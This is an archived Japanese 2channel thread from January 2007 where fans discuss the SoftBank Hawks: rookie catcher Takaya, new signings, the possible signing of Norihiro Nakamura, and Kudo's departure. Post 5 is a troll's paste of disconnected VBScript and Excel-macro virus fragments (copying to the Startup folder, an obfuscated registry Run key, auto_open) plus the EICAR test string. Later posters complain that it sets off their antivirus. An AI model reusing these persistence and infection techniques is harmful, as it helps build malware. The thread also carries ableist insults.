2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

〓☆☆〓いざゆけ若鷹軍団 ホークススレ399〓☆☆〓

1 :代打名無し@実況は実況板で:2007/01/18(木) 23:38:59 ID:rMzS330u0
☆荒らし・煽りには完全無視が最も有効。放置出来ない人も荒らしと同類
☆本スレでの試合中の実況は厳禁!実況には実況板を使う事!(専用ブラウザ推奨)
☆900踏んだ方は必ず次スレを立てましょう。スレ立ての意思のない方、携帯の方は  900を踏まないように。
☆くどいようだけど「実況は厳禁!」


実況板(野球ch)トップ
http://live22x.2ch.net/livebase/

前スレ
〓☆☆〓いざゆけ若鷹軍団 ホークススレ398〓☆☆〓
http://ex13.2ch.net/test/read.cgi/base/1168612297/


球団公式サイト
http://softbankhawks.co.jp

2 :代打名無し@実況は実況板で:2007/01/18(木) 23:39:08 ID:rMzS330u0
■新聞・スポーツ新聞
総合・ヤフー ttp://dailynews.yahoo.co.jp/fc/sports/hawks/
日刊スポーツ ttp://kyusyu.nikkansports.com/
西スポ ttp://www.nishinippon.co.jp/nsp/
読売新聞 ttp://kyushu.yomiuri.co.jp/sports/hawks/
サンスポ ttp://www.sanspo.com/baseball/hawks/hawks.html
スポニチ九州 ttp://www.sponichi.co.jp/seibu/

■福岡のTV局とホークス番組
KBC Hawks2006 ttp://www.kbc.co.jp/sports/hawks2006/
RKB 瞬感スポーツ ttp://www.rkb.ne.jp/syunspo/
TNC とべとべホークス ttp://www.tnc.co.jp/hawks/
FBS 夢空間スポーツ ttp://www.fbs.co.jp/yume/
   ホークス週間MVP ttp://www1.fbs.co.jp/hawks_mvp/
TVQ スポスタ ttp://www.tvq.co.jp/sports/suposuta/

■福岡のラジオ局
KBCラジオ ホークス戦全136試合中継、「夜はこれから!ホークス派宣言」など
ttp://www.kbc.co.jp/radio/
RKBラジオ ホークス戦中継、「ホークス歌の応援団」など
ttp://rkbr.jp/index2.html

3 :代打名無し@実況は実況板で:2007/01/18(木) 23:39:21 ID:rMzS330u0
■福岡ソフトバンクホークス・選手公式サイト
小久保裕紀 ttp://members2.jcom.home.ne.jp/kokubo-fansite/
松中信彦 ttp://www.matsunaka3.net/
川崎宗則 ttp://www.players-kawasaki.com/
斉藤和巳 ttp://www.kazumi-saitoh66.com/
和田毅 ttp://www.tsuyoshi-ch.com/
新垣渚 ttp://nagisa18.com/
馬原孝浩 ttp://www.viewnet.jp/mahara.club14/
山崎勝己 ttp://iac-npo.de-blog.jp/yamazaki/
的場直樹 ttp://ameblo.jp/matton26/
竹岡和宏 ttp://www.kazoo246.com/
秋山幸二(総合コーチ) ttp://www.koji-akiyama.com/
星野順治 ttp://www.shu-jun.com/
倉野信次 ttp://www.shinji-kurano41.com/
水田章雄 ttp://www.mizuta44.com/
藤井将雄(故人) ttp://www.ado.ne.jp/~fujii/
多村仁 ttp://www.hitoshitamura.com

4 :代打名無し@実況は実況板で:2007/01/18(木) 23:39:33 ID:rMzS330u0
書き込む| 名前: |            | E-mail(省略可): | sage          |
 ̄ ̄ ̄ ̄        ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄          ,__  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\    iii■∧   。
     書き込むとき、E-mail欄に『 sage 』(半角)>  〔 ・,e,・〕/
     と記入すると、スレッドが上がりません  | ▽(|    つ
    _________________/ | ̄ ̄ ̄ ̄ ̄|
         ━━━━━━━━━━━━━━━━━━━━━━━
          【 sage の利点 】
     ,__     1・書き込みの後もスレッド順位は変更されない。
     iii■∧  。  2・だから荒氏に見つからない
    〔∂ヮ∂〕/   3・マターリ進行のスレッドに有効
  ▽(|    つ
  | ̄ ̄ ̄ ̄ ̄|━━━━━━━━━━━━━━━━━━━━━━━
         ━━━━━━━━━━━━━━━━━━━━━━━
          【sage進行のススメ】
     ,__      ・野球板の各球団メインスレはsageで書き込むのが
     iii■∧  。    基本です。理由は上で和田サンが説明している通り。
   (┯)(┯)/     sageないで荒氏と間違われても、文句は言わないでね。

5 :代打名無し@実況は実況板で:2007/01/18(木) 23:39:37 ID:RkchGFpx0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

6 :代打名無し@実況は実況板で:2007/01/18(木) 23:39:47 ID:rMzS330u0
>>900を踏んだ方は責任を持ってスレ立てを行って下さい。
スレ立てが出来なかった場合はこのスレに報告し、他の人に
スレ立てを依頼して下さい。

幾人かがスレ立てにチャレンジし、それでもスレが立たなかった場合は
以下のスレッドにて、>>900が依頼を行って下さい。

但し、試合開始2時間前から試合中までの間に>>900に至った場合は
スレ立てや依頼は試合終了後まで控えるようにして下さい。

また、スレ立て等の報告がスムーズに行われるように、レス数が>>900
超えたら、なるべくその他の議論を控えるようにして下さい。

◆スレ立て代行依頼スレッド◆28◆(age推奨)
http://ex13.2ch.net/test/read.cgi/base/1166081832/

7 :代打名無し@実況は実況板で:2007/01/18(木) 23:39:52 ID:rMzS330u0
>>900を踏んだ方は責任を持ってスレ立てを行って下さい。
スレ立てが出来なかった場合はこのスレに報告し、他の人に
スレ立てを依頼して下さい。

幾人かがスレ立てにチャレンジし、それでもスレが立たなかった場合は
以下のスレッドにて、>>900が依頼を行って下さい。

但し、試合開始2時間前から試合中までの間に>>900に至った場合は
スレ立てや依頼は試合終了後まで控えるようにして下さい。

また、スレ立て等の報告がスムーズに行われるように、レス数が>>900
超えたら、なるべくその他の議論を控えるようにして下さい。

◆スレ立て代行依頼スレッド◆28◆(age推奨)
http://ex13.2ch.net/test/read.cgi/base/1166081832/

8 :代打名無し@実況は実況板で:2007/01/18(木) 23:49:20 ID:HJZZikhZO
いちおつ

9 :代打名無し@実況は実況板で:2007/01/18(木) 23:51:01 ID:IbU6yg2n0
>>1
才 ゙ノ 力 ν一

10 :代打名無し@実況は実況板で:2007/01/19(金) 00:34:55 ID:k0wDuWqn0
1:事実に対して仮定を持ち出す
 「西武は松坂を金で売ったね。ウチは日本球界のためにポスティングは認めてないよ」
2:ごくまれな反例をとりあげる
 「ウチはPO無ければ3年のうち1回優勝してるし。西武は実質優勝0回だね」
3:自分に有利な将来像を予想する
 「中田翔、斎藤佑樹はSBに入りたいはず」
4:主観で決め付ける
 「POがなければ毎年優勝できる」
5:資料を示さず自論が支持されていると思わせる
 「寺原は潜在能を発揮すれば松坂より上だった、トレードに関して妥当」
6:一見関係ありそうで関係ない話を始める
 「川崎はイチローと師弟関係だよ」
7:陰謀であると力説する
 「これは性豚、ジャブオタの陰謀だ!」
8:知能障害を起こす
  中身の無いスポーツ記事コピペ貼り付け
9:自分の見解を述べずに人格批判をする
 「アンチはキチ○イ」
10:ありえない解決策を図る
  自分の知っている他球団の主力選手、メジャー選手の名を挙げ「xxを獲得しろ
11:レッテル貼りをする
 「また性豚か」   
12:決着した話を経緯を無視して蒸し返す
 「2004年はウチが優勝してた」
13:勝利宣言をする
 「今年はぶっちぎりで優勝するよ」
14:細かい部分のミスを指摘し相手を無知と認識させる
 「松中は劣化してない、2005年は二冠獲った」
15:新しい概念が全て正しいのだとミスリードする
 「アンチ=嫉妬」

11 :代打名無し@実況は実況板で:2007/01/19(金) 00:42:04 ID:S6kkzHFq0
またウイルス貼ったやついるな

12 :代打名無し@実況は実況板で:2007/01/19(金) 01:08:06 ID:SLCTBdc2O
>>1
糞スレたてんな糞

13 :代打名無し@実況は実況板で:2007/01/19(金) 01:12:24 ID:k0wDuWqn0
>>12
松中しく同意

14 :代打名無し@実況は実況板で:2007/01/19(金) 01:35:18 ID:pyPjWU9b0
しかし、よほど時間を持て余しているのか
他球団のことをここまで気にしてくれるとはある意味凄いw
ごくろうさん

15 :代打名無し@実況は実況板で:2007/01/19(金) 03:04:37 ID:zlTB75AE0
ホワイトプランのCMで盛り上がってたみたいですが
馬原が映画「守護神」のCMに声だけナレーションで出演するよ
昨日、佐世保で自主練の合間をぬって収録してた
収録中に城島が野次飛ばしたりしてチャカしてたりしてたけど
無事に収録終えたっぽい

「ソフトバンクホークス守護神の馬原です」
みたいな感じで映画の画像をバックにナレーションする形
守護神繋がりと言う事でオファー来たみたいね
全国放送なのか、九州限定なのかは不明っす

16 :代打名無し@実況は実況板で:2007/01/19(金) 07:45:16 ID:6sv9IOB50
>>14
都合の悪いことはすべてユダヤの陰謀、乙。

17 :代打名無し@実況は実況板で:2007/01/19(金) 10:17:21 ID:mlPPiZJk0
test

18 :代打名無し@実況は実況板で:2007/01/19(金) 10:44:16 ID:Afys3hFLO
魁龍ラーメン最強説

19 :代打名無し@実況は実況板で:2007/01/19(金) 11:10:12 ID:CgUe4Qg10
ガス中滅

20 :代打名無し@実況は実況板で:2007/01/19(金) 11:45:57 ID:hW7FYGx20
歯糞菓子軍団

21 :代打名無し@実況は実況板で:2007/01/19(金) 12:31:39 ID:4yv1W0CYO
1/28 ジャンクに多村

22 :代打名無し@実況は実況板で:2007/01/19(金) 12:39:05 ID:hW7FYGx20
>>21
多村はジャンクだよ

23 :代打名無し@実況は実況板で:2007/01/19(金) 12:40:20 ID:hW7FYGx20
命名

「ジャンク多村」

24 :代打名無し@実況は実況板で:2007/01/19(金) 13:15:14 ID:KoSSrNI80
ゔ〲〰乜勹〰ス


25 :代打名無し@実況は実況板で:2007/01/19(金) 13:20:35 ID:ea7J8Zzi0



チャイチロー川崎





26 :代打名無し@実況は実況板で:2007/01/19(金) 13:24:07 ID:bMoNN2Vc0
ウィルス貼るヤツは誰だよ
まったく、迷惑だぜ

27 :代打名無し@実況は実況板で:2007/01/19(金) 13:25:43 ID:ea7J8Zzi0



チャイチロー川崎





28 :代打名無し@実況は実況板で:2007/01/19(金) 13:29:02 ID:mlPPiZJk0
誤反応スクリプト無効化ソフト
これが便利

29 :ゴメス ◆UfmIFD0BUk :2007/01/19(金) 15:51:13 ID:VsEgwau70
>>1
乙ですぞ!!

30 :代打名無し@実況は実況板で:2007/01/19(金) 15:53:47 ID:JwMYD/kX0
>>28
というか、こんなスクリプトにいちいち反応する
アンチウィルスソフトなんて使わなければいいんじゃね?
スクリプト系の脆弱性なんてだいぶ前に塞がれたセキュリティホールだぞ

31 :代打名無し@実況は実況板で:2007/01/19(金) 16:05:41 ID:sFOuLoB80
貼った奴が悪いだろ…常識的に考えて

32 :代打名無し@実況は実況板で:2007/01/19(金) 16:31:55 ID:mTAhJlhFO
ウイルスじゃないんだからあんまり気にしなくておkですよっ☆(*^-^)b

33 :代打名無し@実況は実況板で:2007/01/19(金) 16:44:37 ID:WgEE8yUV0
だれか、ウィルスで被害こうむった奴はうったえれよ。

こいつから、損害賠償いっぱいふんだくれよ!


34 :代打名無し@実況は実況板で:2007/01/19(金) 17:44:23 ID:LAgDiZNf0
キャンプインはまだ?
退屈すぎ

35 :代打名無し@実況は実況板で:2007/01/19(金) 17:56:40 ID:BlKcIff00
20日大隣らブルペン入り
25日前後自主トレ組が集結
30日箱崎参拝
31日移動
01日キャンプイン

36 :代打名無し@実況は実況板で:2007/01/19(金) 17:58:59 ID:R0+Jl9CM0
>>18

俺も魁龍は好きだ。店主はホークスファンのようだね。

37 :代打名無し@実況は実況板で:2007/01/19(金) 18:32:51 ID:d4uAWWVPO
新外国人ホワイト入団

38 :代打名無し@実況は実況板で:2007/01/19(金) 18:42:39 ID:XqRb8hZw0
伊奈,スイッチって本気かな?

39 :代打名無し@実況は実況板で:2007/01/19(金) 19:19:14 ID:pcFRD6EU0
アダムがなぜか小久保や和巳と一緒に自主トレしてる

40 :代打名無し@実況は実況板で:2007/01/19(金) 19:25:05 ID:mTAhJlhFO
アダムきゅんやる気があって良いですねっ☆(*^-^)b

41 :代打名無し@実況は実況板で:2007/01/19(金) 19:29:01 ID:eoq/E2gWO
ホワイトはやってくれそうだな!!

42 :代打名無し@実況は実況板で:2007/01/19(金) 19:35:37 ID:ARDmAPvh0
便器氏ね

43 :代打名無し@実況は実況板で:2007/01/19(金) 19:48:22 ID:4fE9Ca0nO
>>39
マジ?小久保の自主トレキツイだろうに。
歳が歳だからあまり期待はできないがやる気はあるみたいだな、好印象。

44 :代打名無し@実況は実況板で:2007/01/19(金) 19:54:38 ID:djf7KZbj0
小久保のトレーナーがアダムと知り合いだったので
一緒に自主トレに参加してるらしい

45 :代打名無し@実況は実況板で:2007/01/19(金) 19:59:44 ID:mTAhJlhFO
キャンプまだかな〜☆(*^-^)b

46 :代打名無し@実況は実況板で:2007/01/19(金) 20:10:29 ID:WiN7cWmqO
ホワイトのシーズン中の働きに期待。

巨人の外国人のごとくもう終りじゃないよな!?

47 :代打名無し@実況は実況板で:2007/01/19(金) 20:21:06 ID:7DKdFrjT0
新外人にはまったく期待してなかったから
アダムが新鮮かつ好印象だったな。
.275HR15、そこそこ犠牲フライ打ってくれればOKだかんね。

48 :代打名無し@実況は実況板で:2007/01/19(金) 20:25:02 ID:s+wm95dd0
アダムって名前からして男前やな。

49 :代打名無し@実況は実況板で:2007/01/19(金) 20:29:39 ID:mTAhJlhFO
じゃあ私はイヴだねっ☆(*^-^)b

50 :代打名無し@実況は実況板で:2007/01/19(金) 20:31:18 ID:XjRUv7Rw0
金の亡者 工藤がダイエーでは金が少ないと、
ジャイに行ったが、プロテクト外れてw横浜に買われた2億円減wwwww

ざまーみろ!w

51 :代打名無し@実況は実況板で:2007/01/19(金) 20:49:06 ID:M+vVas6m0
>>50
人間のクズやね

52 :代打名無し@実況は実況板で:2007/01/19(金) 20:53:52 ID:uNbvNbf+0
アダムのユニフォームは股間に「Sh」と書いたイチジクの葉っぱだけの予感

53 :代打名無し@実況は実況板で:2007/01/19(金) 20:54:25 ID:Afys3hFLO
>>50
人間のクズやね

54 :代打名無し@実況は実況板で:2007/01/19(金) 21:12:53 ID:ARDmAPvh0
横浜に行くことはもう野球選手として大金を稼げないということ
前途のある寺原を放出した便器は死ね

55 :代打名無し@実況は実況板で:2007/01/19(金) 21:19:24 ID:ekljI1cdO
ホワイトに期待

56 :代打名無し@実況は実況板で:2007/01/19(金) 21:20:02 ID:n8MQ3oQM0
寺原は可哀想だが、、、
工藤はざまーみろだなw

57 :代打名無し@実況は実況板で:2007/01/19(金) 21:24:31 ID:s+wm95dd0
高谷ってめちゃめちゃ期待されてんな、、、。

58 :代打名無し@実況は実況板で:2007/01/19(金) 21:49:36 ID:OZH4rU+K0
巨人 → ナベツネがいらんと言った
阪神 → 岡田がいらんと言った
広島 → うちは若手売り出しがいるからと育成何とかが言った
横浜 → 大矢がいらないと言った
ヤク → 多菊があんなのいらないと言った
中日 → 落合がいらんと言った

千葉 → 1000万なら → 釣りでした
ハム → 1500万払うなら職員雇ったほうがマシ
福岡
西武 → 若手がのびている。イラネ。
楽天 → 創立1年目なら欲しかったwww
オリ → 自 由 契 約

もうノリさんを救えるのはホークスしかありません、鷹ファンもこんな事言ってますし・・・・

http://blog.goo.ne.jp/hot_soul0803/e/4db5f21e41aa7df45e88ebfe774a3e28
http://blog.goo.ne.jp/hot_soul0803/e/20b75b383f04cb7aac1cdfb58eb2ca3d
http://blog.goo.ne.jp/hot_soul0803/e/6aea47ff991dc4e0c859be4e0e365d74

59 :代打名無し@実況は実況板で:2007/01/19(金) 21:54:53 ID:mTAhJlhFO
今年のホークスは高谷きゅんにかかってると言っても過言ではありませんっ☆(*^-^)b

60 :代打名無し@実況は実況板で:2007/01/19(金) 22:08:36 ID:guFjUIzuO
※注意
ここで工藤ざまーみろとか言ってる人は、ホークスファンではなく、ただの成り済まし荒らしだから誤解しないように

61 :代打名無し@実況は実況板で:2007/01/19(金) 22:11:55 ID:sBdi1phg0
>>58
【福岡】→ 1/18 メジャーに挑戦した選手でもある。まだまだ若いんだし、老け込むには早すぎるよ(王監督)

62 :代打名無し@実況は実況板で:2007/01/19(金) 22:14:41 ID:OZH4rU+K0
>>61
脈はあるな

63 :代打名無し@実況は実況板で:2007/01/19(金) 22:15:42 ID:guFjUIzuO
ウィルス貼る奴はやり過ぎ。荒らしの域越えてる

64 :代打名無し@実況は実況板で:2007/01/19(金) 22:18:18 ID:guFjUIzuO
>>61
ノリはマジいらんわ。サードは小久保松田でいっぱいいっぱいだ

65 :代打名無し@実況は実況板で:2007/01/19(金) 22:23:43 ID:mTAhJlhFO
松田きゅん覚醒しないかな〜っ☆(*^-^)b

66 :代打名無し@実況は実況板で:2007/01/19(金) 22:25:07 ID:U6Ug4lZG0
工藤が残留してたら、7連覇してたかもな
セクシャル高塚がすべての元凶だ

67 :代打名無し@実況は実況板で:2007/01/19(金) 22:33:46 ID:XbuwCNlM0
流石に中村の獲得は無いと思うが・・・
小久保復帰に沸いているファンに失礼だし
何より小久保本人に失礼だろ


68 :代打名無し@実況は実況板で:2007/01/19(金) 22:36:23 ID:U6Ug4lZG0
ノリが万が一入ったとしても
小久保を押しのけるような実力はないな
せいぜい、松田の噛ませ犬だろう
どっちにしろ、残り2人分しかない選手枠使うのはもったいない
まだ、宮地再雇用の方がまし

69 :代打名無し@実況は実況板で:2007/01/19(金) 22:46:00 ID:5+7Hdh1o0
ホークスヲタですが、
工藤が大嫌いです。
ズレータが嫌いです。

寺原は好きです、大道も宮地お好きですがなにか?

70 :代打名無し@実況は実況板で:2007/01/19(金) 22:49:05 ID:OZH4rU+K0
       巛彡ミミミ彡彡       とーつぜん嵐が巻き起こり(巻き起こり〜)     
       巛巛巛巛巛彡彡     とーつぜん拍手がわき起こり(わき起こり〜)
       |:::::::::        |      
       |::::::::  ___、 ,_,l       だれかが打たねばならぬとき
       |:::::::   =・ニ , 〔・={      だれかがやらねばならぬとき
       |(6  `   _ 」 }     
       | l  ┃' ー-=-'┃,,,,,,、    今この試合に勝たなきゃいけない
       |  、  ┃ ⌒┃!(:※:)  みんなの想いを壊しちゃいけない
      ,ノ`ヽ、 ヽ、. ━━/ ィ|__|、                            
 ;;;;;; : : : ヽ`ヽ、  ` ー ,,r" ^ニ〕ヽ   r-,,、__   ノリの瞳が輝いて
 ;;;;;; : : : : :ヽ : ": ̄,,,/ヘ   ^ニソ :ヽ r^フ/ノノ、   中村ノーリ (ノーリ)
  ;;;;;; : : : ` : : : : r' : : : `ヽ ィ;i-:i´ : : :〉(ィ⌒ -ミ´ノ  
  ;;;;;;; : : : : `ヽr'" : : : : : : ノ' || : : : :;Y 、ノ ,.ノ _    ノリ! ノリ! ノリ! ノリ! ノリ!
                                燃えろノリ! 燃えろよ〜

71 :代打名無し@実況は実況板で:2007/01/19(金) 22:55:24 ID:hUVai6S/0
>>70
元ネタすごくわかるオッサンですが何か…orz

72 :代打名無し@実況は実況板で:2007/01/19(金) 22:58:30 ID:DuUxGTrl0
ソフトバンクケータイのCM見て思ったんだが、
ホークスの投手ってあんなカンジで外人選手いじめてるんだろうな
それでズレータとかも精神的に不安定になって乱闘しちゃったりとか
退団したくなったりとかしたんだろう
あんなガキみたいな奴らに馬鹿にされたんじゃメジャーリーガーとしては耐えられんだろう
なんかその辺教育できる奴がいればいいのにな。せめて工藤でもいれば・・・

73 :代打名無し@実況は実況板で:2007/01/19(金) 23:07:17 ID:ARDmAPvh0
ズレータの暴力は貧打に困ったベンチ(便器)の指示

74 :代打名無し@実況は実況板で:2007/01/19(金) 23:09:17 ID:YpJBZmZT0
まだ、工藤バカヲタが居座っているのかよ。
帰れよバカヲタ!
CMと現実を同化するバカは工藤がお似合いw

75 :代打名無し@実況は実況板で:2007/01/19(金) 23:32:24 ID:axf/f/xa0
ここ2年くらい、このスレがまともに機能してるのを見たことがない
荒らしとニワカと頭がおかしいのしかいないし

76 :代打名無し@実況は実況板で:2007/01/19(金) 23:42:49 ID:FMn+f8Qh0
新スレたてるごとにウイルス反応


性豚いいかげんにしておけよ

77 :代打名無し@実況は実況板で:2007/01/19(金) 23:47:47 ID:ARDmAPvh0
>>76
>>10

78 :代打名無し@実況は実況板で:2007/01/19(金) 23:47:51 ID:8DxTXIAa0
76 名前:あぼ〜ん[あぼ〜ん] 投稿日:あぼ〜ん



79 :代打名無し@実況は実況板で:2007/01/19(金) 23:49:18 ID:n5NoOthAO
>>72
うぜぇ…
必死だな、この馬鹿!
いつ氏んでいただいても結構ですよ?

80 :代打名無し@実況は実況板で:2007/01/19(金) 23:57:25 ID:U6Ug4lZG0
松中の「一塁」大いに歓迎 森脇コーチ【88】
 森脇内野守備走塁コーチが松中の「一塁復帰」を歓迎した。今オフ退団したズレータに代わり
来季は2年ぶりの一塁守備にも照準を合わせているが
コーチは従来から松中の守備力を高く評価。「(内野の)両サイドに松中と小久保がドンといるのが
本来のウチの布陣。再度挑戦してほしい」と歓迎。一方で、他選手にも「僕らは固定観念は持たない
若い選手にもどんどん挑んでもらいたい」と配慮を忘れなかった
=2007/01/17付 西日本スポーツ=

キャンプ中に巡回スカウト 秋山コーチ【80】
 秋山総合コーチが春季キャンプで“巡回スカウト”を務める。前日に王監督が2月1日から
ユニホームを着る意向を正式表明。「王監督がいるといないでは全然違うし
よーいドンで見てもらえるのは選手にとっても一番いい」。自らは王監督をサポートする一方で
B組にも積極的に目を配る方針。「いい選手がいれば、入れ替えを考えればいい」
4年ぶりのV奪回へチーム一丸の戦闘力向上を図る。
=2007/01/18付 西日本スポーツ=

マーくんにエール 王貞治監督【89】
 王監督が大隣と並ぶ話題のルーキー・楽天田中(駒大苫小牧)にエールを送った
「ダイナミックなフォーム、スライダーがいい。先発ローテに入るチャンスもあるんじゃないか」
今季は仙台移転3年目で、地元ではプロ野球人気も上昇中。「パ・リーグはフランチャイズ制がうまくいっている
仙台もそうなってほしいし、彼には頑張ってほしい」。地元密着のキーマンに「マーくん」を指名していた
=2007/01/18付 西日本スポーツ=


81 :代打名無し@実況は実況板で:2007/01/19(金) 23:59:47 ID:mTAhJlhFO
松中きゅんかわいいっ☆(*^-^)b

82 :代打名無し@実況は実況板で:2007/01/20(土) 00:05:38 ID:TkEq9uAx0
「電脳捕手」でデータ管理!? 高谷裕亮【12】
 「電脳捕手」になる。休日は知人の勤める天神でパソコン探し
ネット以外に重要な用途がある。「好不調時の打撃フォームの画像を見比べたり
投手のデータを管理しやすいと思って」。パソコンを扱ったのは
「大学の授業ぐらい」だが、大量の情報管理のために機械オンチは卒業する
大石バッテリーコーチは「いいと聞いているからね」と18日に視察する予定を明かした
=2007/01/17付 西日本スポーツ=

高谷 開幕マスク有力候補
 大社ドラ3巡目、高谷裕亮捕手が18日、開幕マスクの有力候補に。初視察した大石友好バッテリーコーチが
軽快な動きとスローイングに合格点を与えたもので、明言はしなかったものの、春季キャンプでは
A組スタートが決定的に。結果次第で新人開幕スタメンも
王監督は「白紙」
 視察に訪れた大石コーチが、高谷の動きに目を凝らす。「身のこなしがいいね。スローイングも問題ない」
ランニングやキャッチボール…。判断材料は少なかったが、正捕手レースに参戦するだけの資質は十分
 王監督が「白紙」と強調している定位置争い。軸が不在の捕手陣に最も当てはまる
昨季103試合にマスクをかぶった山崎、経験のある的場、打力を併せ持つ田上、秋のキャンプで成長を
アピールした領健…。「横一線としか言えない」。大石コーチは慎重な言い回しに終始
 チャンスがある以上、高谷にも道は開かれている。「とにかくケガをしないように、体をつくってくれ。DVDで
頭の勉強の方もしっかりな」。大石コーチは高谷を激励。キャンプA組スタートの事実上の“内定通知”だった
 「年齢的にもA組スタートや開幕1軍はクリアしないといけない。目標は開幕スタメンと1軍定着です」
大石コーチの評価にも高谷に浮かれる様子はない。「カズミさんが西戸崎に来られるのなら
球を受けてみたい気持ちはあります」。ホークスでは2リーグ制後初となる新人の開幕スタメンに照準ピタリ
 打撃マシンを使ったキャッチング練習もスタート。22日からの第3クールではブルペンで投手の球を受ける
「投手から早く信頼される存在になりたい」。前評判通りの実力と、スキのない言動。25歳のルーキーが
正捕手候補に堂々と躍り出た

=2007/01/19付 西日本スポーツ=



83 :代打名無し@実況は実況板で:2007/01/20(土) 00:38:41 ID:caBD61+F0
>>72
妄想が激しすぎるので月曜日脳のMRI検査でも受けた方がいいようです

84 :代打名無し@実況は実況板で:2007/01/20(土) 00:48:41 ID:L4Aih/rk0
>>77
西武ファンktkrwww

85 :代打名無し@実況は実況板で:2007/01/20(土) 00:57:47 ID:i2Sbdkt7O
ここって正に釣り堀だよな

86 :代打名無し@実況は実況板で:2007/01/20(土) 01:00:16 ID:EzLwN59j0
>>85
釣り堀の魚に謝れ!
肥溜めだよ。

87 :代打名無し@実況は実況板で:2007/01/20(土) 01:00:44 ID:XoZhasGU0
先ほど瞬間スポーツをみたが、松中のでこであんな大きな長い傷が昔からあったっけ?
めちゃくちゃ大きい深い傷だったぞ。

88 :代打名無し@実況は実況板で:2007/01/20(土) 01:05:30 ID:Gk0UsJ3N0
植毛に失敗した古傷

89 :代打名無し@実況は実況板で:2007/01/20(土) 01:11:06 ID:EzLwN59j0
>>83
妄想をMRIで検出するってのもなあ、
なんかスゴイ知性だな。

90 :代打名無し@実況は実況板で:2007/01/20(土) 01:14:41 ID:Gk0UsJ3N0
トンコツラーメンと明太子ばかり食ってるから知能が低い

91 :代打名無し@実況は実況板で:2007/01/20(土) 01:18:02 ID:L4Aih/rk0
それは否定しないw

俺の血管にはトンコツが流れてる!

92 :代打名無し@実況は実況板で:2007/01/20(土) 01:18:33 ID:rRANNL5Y0
>>89
知性は寝たほうがいいぞ

93 :代打名無し@実況は実況板で:2007/01/20(土) 01:20:45 ID:TkEq9uAx0
高谷は前評判通りの力を今のところアピールできてるな
山崎、田上、的場達もうかうかしてたら
マジで正捕手の座を獲られちゃうぞ

94 :代打名無し@実況は実況板で:2007/01/20(土) 01:23:46 ID:EzLwN59j0
>>92
知性が寝るってのもなあ、
知性って動物の名前か何か?

95 :代打名無し@実況は実況板で:2007/01/20(土) 01:24:09 ID:741SWQpwO
だって今年は高谷きゅん次第ですからねっ☆(*^-^)b

96 :代打名無し@実況は実況板で:2007/01/20(土) 01:28:41 ID:EzLwN59j0
>>95
西郷どんが鹿児島弁なのは知ってたけど、
博多弁では西郷きゅんなんですね。
ありがとう。

97 :代打名無し@実況は実況板で:2007/01/20(土) 01:29:41 ID:rRANNL5Y0
>>94
池沼はこれだから(ry

98 :代打名無し@実況は実況板で:2007/01/20(土) 01:33:45 ID:Gk0UsJ3N0
久留米ラーメン>>>>>>>>>博多ラーメン

99 :代打名無し@実況は実況板で:2007/01/20(土) 01:34:24 ID:JdU1jo1Q0
知的障害を略したうえで当て字にしたんだろ


100 :代打名無し@実況は実況板で:2007/01/20(土) 01:35:13 ID:EzLwN59j0
>>97
池だか沼だかどっちかはっきりしろ!



101 :代打名無し@実況は実況板で:2007/01/20(土) 01:35:49 ID:741SWQpwO
西郷どんきゅんもイケメンですねっ☆(*^-^)b

102 :代打名無し@実況は実況板で:2007/01/20(土) 01:36:59 ID:wjuf/+U70
熊本ラーメン>>>>>>久留米ラーメン

103 :代打名無し@実況は実況板で:2007/01/20(土) 01:39:05 ID:EzLwN59j0
>>101
イケメンもおそらくとんこつ味ですね。
今度注文してみます。

104 :代打名無し@実況は実況板で:2007/01/20(土) 01:42:38 ID:Gk0UsJ3N0
熊本ラーメンは麺が太すぎで絡まないからまじい

105 :代打名無し@実況は実況板で:2007/01/20(土) 01:45:29 ID:EzLwN59j0
>>104
それが熊本の良かとこですたい。
福岡ファンは絡むからウザイ。

106 :代打名無し@実況は実況板で:2007/01/20(土) 01:47:41 ID:L4Aih/rk0
絡まれたくないなら書き込むなとw

107 :代打名無し@実況は実況板で:2007/01/20(土) 01:49:31 ID:Cb9rq9Tm0
2ちゃん閉鎖まだー?

108 :代打名無し@実況は実況板で:2007/01/20(土) 01:51:11 ID:EzLwN59j0
>>106
日本語の句点は「w」じゃなくて、「。」ですよ。
右手の薬指のところにあります。

109 :代打名無し@実況は実況板で:2007/01/20(土) 01:53:08 ID:L4Aih/rk0
・・・・・

110 :代打名無し@実況は実況板で:2007/01/20(土) 01:57:45 ID:EzLwN59j0
>>109
惜しいです。
でも、「・」は小指ですね。
「。」はその隣です。
それと、文を入力する前に、うっかり送信ボタンを押してしまいましたね。
気をつけましょう。

111 :代打名無し@実況は実況板で:2007/01/20(土) 02:07:28 ID:rRANNL5Y0
さすがの池沼っぷりだなw

112 :代打名無し@実況は実況板で:2007/01/20(土) 02:12:18 ID:EzLwN59j0
池沼ではなくて肥溜めですね。
それと、日本語の句点には「。」を使いましょう。
「w」を使うと馬鹿と思われますよ。

113 :代打名無し@実況は実況板で:2007/01/20(土) 02:14:23 ID:Gk0UsJ3N0
便器同士で争うなよ

114 :代打名無し@実況は実況板で:2007/01/20(土) 02:15:16 ID:EzLwN59j0
>>113
